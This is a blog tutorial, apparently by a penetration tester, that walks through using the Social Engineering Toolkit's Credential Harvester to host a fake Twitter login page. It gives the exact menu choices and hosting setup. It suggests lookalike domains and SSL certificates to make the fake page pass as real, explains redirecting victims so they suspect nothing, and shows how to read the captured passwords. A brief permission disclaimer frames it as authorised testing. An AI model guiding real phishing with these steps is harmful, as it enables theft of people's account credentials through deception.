DISCLAIMER: This post is intended for educational purposes only. Remember to always get written permission from your client before deploying this method outside of a lab environment and check your local laws.
Description
This is a very simple, yet powerful attack that spoofs a legitimate webpage to capture credentials in minutes with the Social Media Toolkit (SET). I use adaptations of this procedure to simulate phishing type attacks for my clients to prove how easy and simple dangerous attacks can be. The attack described in this post can literally be run in minutes and by anyone with basic computer knowledge.
**Remember the BEST defense against an attack like this is educating your clients to identify and report these kinds of events.**
Requirements
- Kali Linux – Download: https://www.kali.org/downloads/
Launch the Social Engineering Toolkit (SET)
(I am assuming you have Kali Linux running and updated)
Open a new terminal window and enter: setoolkit
Launch the Credential Harvester Attack Method
Enter 1
to enter the “Social-Engineering Attacks”
Enter 2
to enter the “Website Attack Vectors”
Enter 3
to enter the “Credential Harvester Attack Method”
Enter 1
to enter the “Web Templates”
Note: From here you could also do option 2 to clone an existing login page. SET is scary good at cloning login pages that have a “username” and “password” field on the same page.
You will be prompted to confirm the IP address for where the template will be hosted. Press <ENTER> to continue.
Note: This is the IP that your target would see. If you are behind a firewall or in the cloud use your public IP if the target is external to your firewall.
Select a pre-made template. For this example I am using option 3
and then press <RETURN> when prompted.
Executing the Attack
Point your browser to the IP you entered (or accepted) when launching the attack in a web browser. In my example I would enter: http://10.211.55.3
Looks pretty legit. Its an older style template but other than the IP at the top it could easily pass. To make it look even more passable I could register a DNS name with Twitter thrown in such as twitter.subproject9.com. Since most browsers show non-SSL sites as warning, I would also also utilize an SSL certificate to try to make the page look more authentic.
What a Target Would See
The target would be presented with a seemingly valid login page, in this example Twitter. The user would login as normal.
Upon hitting “Sign in” the targets credentials will be captured and they will be redirected to the actual Twitter login page. The goal is to fool the target in to think they have entered the wrong credentials or something went wrong on Twitter’s end. That way they login again, gain access to Twitter and no concerns or red flags are raised.
Viewing the Captured Credentials
There are a few ways to view captured credentials.
First, through the console logging. All activity on your credential harvesting site will be displayed in real-time on your console. I have highlighted the credentials I entered into the fake Twitter site.
To exit the attack click Ctl-C
and a report will be generated in an HTML and XML format.
All you have to do is browse to the folder listed in blue and open the HTML file to see the report.
That’s it!